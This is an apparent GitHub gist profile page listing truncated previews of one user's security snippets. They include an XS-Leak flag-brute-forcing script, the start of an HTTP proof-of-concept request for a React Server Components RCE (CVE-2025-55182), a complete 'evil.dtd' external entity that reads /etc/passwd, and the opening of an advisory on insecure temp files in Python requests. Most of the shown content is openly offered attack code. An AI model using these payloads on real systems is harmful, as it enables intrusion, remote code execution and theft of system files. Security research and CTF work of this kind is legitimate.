Skip to content

Instantly share code, notes, and snippets.

View Jaycelation's full-sized avatar
🎯
Focusing

Jaycelation Jaycelation

🎯
Focusing
14 followers · 32 following
View GitHub Profile
@Jaycelation
Jaycelation / index.html
Last active March 23, 2026 11:22
<!DOCTYPE html>
<html>
<head>
<title>Nightbyte XS-Leak</title>
</head>
<body>
<h1>Leaking Flag...</h1>
<script>
const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_}".split("");
const urlBase = "https://localhost:5000/library?q=";
@Jaycelation
Jaycelation / CVE-2025-55182.http
Created February 6, 2026 04:27 — forked from maple3142/CVE-2025-55182.http
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@Jaycelation
Jaycelation / evil.dtd
Last active January 31, 2026 17:45
<!ENTITY hack SYSTEM "file:///etc/passwd">
@Jaycelation
Jaycelation / PoC.md
Created December 10, 2025 16:52
Insecure Temp File Reuse in extract_zipped_paths() leads to TLS Trust Bypass in Python Requests 2.32.5

Security Advisory: Insecure Temporary File in Python requests library (v2.32.5)

Author: Jayce Dang (Jaycelation)

Status: Unpatched / Vendor Unresponsive

Affected Product: Python requests library

Affected Version: 2.32.5 (and likely earlier versions)